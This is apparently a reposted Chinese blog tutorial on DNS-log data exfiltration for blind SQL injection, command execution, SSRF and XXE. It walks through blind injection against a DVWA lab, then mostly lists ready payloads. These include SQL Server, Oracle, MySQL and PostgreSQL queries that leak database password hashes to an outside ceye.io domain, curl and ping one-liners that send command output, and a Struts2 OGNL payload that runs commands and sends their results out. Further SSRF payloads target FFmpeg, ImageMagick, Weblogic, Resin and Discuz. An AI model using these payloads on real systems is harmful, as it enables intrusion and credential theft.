dnslog小技巧

标签：ace   版本号   命令   之间   tables   comm   注入   ext   oracl   

一、dnslog利用场景

主要针对无回显的情况。

• Sql-Blind
• RCE
• SSRF
• RFI

二、原理

将dnslog平台中的特有字段payload带入目标发起dns请求，通过dns解析将请求后的关键信息组合成新的三级域名带出，在ns服务器的dns日志中显示出来。

三、案例展示

1.sql盲注

• 普通的注入
  输入 1‘ and ‘1‘=‘1，查询成功，1‘ and ‘1‘=‘2查询失败，结果为空
  
  
  输入 1‘ or ‘1‘=‘1 查询成功
  
  综上，存在注入，字符型。

使用 order by 猜解出来字段为2。

显位，输入 1‘ union select 1,2 #

输入 1‘ union select user(),database() #获取当前用户及数据库

就不继续往下了(这是非盲注)，但盲注是不显位的，除了我们常规的猜数据库长度，二分法猜每个字母 acsii码 值外，就能用到dnslog了。

• dnslog用于盲注
  判断注入
  输入 1, 2, 3, 4, 5 ，显示存在；
  输入 1‘ and ‘1‘=‘1 ，显示存在；
  输入 1‘ and ‘1‘=‘2 ，显示不存在。
  
  
  存在注入，字符型。
  这里就不用判断字段了，判断字段是为了后面显位。

这里直接使用 dnslog 平台的二级域名 b182oj.ceye.io。
输入如下查询数据库，然后到dnslog平台查看：

# dns查询有长度限制，必要的时候需要对查询结果做字符串切割。
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/
?id=1' and if((select load_file(concat('\\\\',(select database()),'.b182oj.ceye.io\\sql_test'))),1,0)--+ 
&Submit=Submit#

其中 and if((select load_file(concat(‘\\\\‘,(select database()),‘.b182oj.ceye.io\\sql_test‘))),1,0)--+
解释如下：

- and    连接符，测试用 or 也可以
- if(x,1,0)    如果x为真输出1，为假输出0，在此不重要，主要是将 x带入数据库中，然后得出的结果进行dns解析成 dvwa.b182oj.ceye.io
- select    查询
- load_file()    读取文件内容
- concat    拼接字段，这里拼接成了 \\dvwa.b182oj.ceye.io\sql_test
- \\\\    widnows中用共享文件的时候就会用到这种网络地址的形式，而且转义问题所以前面4个\变成了2个，后面2个变成了1个，最终结果见上一行。
- select database()    查看当前数据库，查询的任何内容在此替换（如查表、字段、数据等）。
- 最后 --+ 为mysql注释，-- 后需要一个空格，用+代替。

完整流程：

# 爆数据库（mysql5.0以上版本才有information_schema数据库）
select schema_name from information_schema.schemata limit 0,1
select schema_name from information_schema.schemata limit 1,1
# 爆表（后面为数据库名或者其十六进制）
select table_name from information_schema.tables where table_schema='dvwa' limit 0,1
select table_name from information_schema.tables where table_schema=0x64767761 limit 0,1
# 爆字段
select column_name from information_schema.columns where table_name='users' limit 0,1
# 爆数据
select user from users limit 0,1
select password from users limit 0,1
得到 admin / 5f4dcc3b5aa765d61d8327deb882cf99

2.命令执行

curl http://b182oj.ceye.io/`whoami`

win的常用变量

其他payload

0x00 Command Execution

• 1.*nix:

curl http://b182oj.ceye.io/`whoami`
ping `whoami`.b182oj.ceye.io

• 2.windows

ping %USERNAME%.b182oj.ceye.io

0x01 SQL Injection

• 1.SQL Server

DECLARE @host varchar(1024);
SELECT @host=(SELECT TOP 1
master.dbo.fn_varbintohexstr(password_hash)
FROM sys.sql_logins WHERE name='sa')
+'.b182oj.ceye.io';
EXEC('master..xp_dirtree
"\\'+@host+'\foobar$"');

• 2.Oracle

SELECT UTL_INADDR.GET_HOST_ADDRESS('b182oj.ceye.io');
SELECT UTL_HTTP.REQUEST('http://b182oj.ceye.io/oracle') FROM DUAL;
SELECT HTTPURITYPE('http://b182oj.ceye.io/oracle').GETCLOB() FROM DUAL;
SELECT DBMS_LDAP.INIT(('oracle.b182oj.ceye.io',80) FROM DUAL;
SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.b182oj.ceye.io',80) FROM DUAL;

• 3.MySQL

SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.b182oj.ceye.io\\abc'));

• 4.PostgreSQL

DROP TABLE IF EXISTS table_output;
CREATE TABLE table_output(content text);
CREATE OR REPLACE FUNCTION temp_function()
RETURNS VOID AS $
DECLARE exec_cmd TEXT;
DECLARE query_result TEXT;
BEGIN
SELECT INTO query_result (SELECT passwd
FROM pg_shadow WHERE usename='postgres');
exec_cmd := E'COPY table_output(content)
FROM E\'\\\\\\\\'||query_result||E'.psql.b182oj.ceye.io\\\\foobar.txt\'';
EXECUTE exec_cmd;
END;
$ LANGUAGE plpgsql SECURITY DEFINER;
SELECT temp_function();

0x02 XML Entity Injection

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://b182oj.ceye.io/xxe_test">
%remote;]>
<root/>

0x03 Others

• 1.Struts2

xx.action?redirect:http://b182oj.ceye.io/%25{3*4}
xx.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://b182oj.ceye.io/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}

• 2 FFMpeg

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://b182oj.ceye.io
#EXT-X-ENDLIST

• 3.Weblogic

 xxoo.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://b182oj.ceye.io/test&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search

• 4.ImageMagick

push graphic-context
viewbox 0 0 640 480
fill 'url(http://b182oj.ceye.io)'
pop graphic-context

• 5.Resin

xxoo.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://b182oj.ceye.io/ssrf

• 6.Discuz

http://xxx.xxxx.com/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://b182oj.ceye.io/xx.jpg[/img]&formhash=xxoo

dnslog平台：
http://ceye.io/
referer：
https://bbs.ichunqiu.com/thread-22002-1-1.html
http://www.52bug.cn/%E9%BB%91%E5%AE%A2%E6%8A%80%E6%9C%AF/4519.html

dnslog小技巧

标签：ace   版本号   命令   之间   tables   comm   注入   ext   oracl   

原文地址：https://www.cnblogs.com/sstfy/p/10351807.html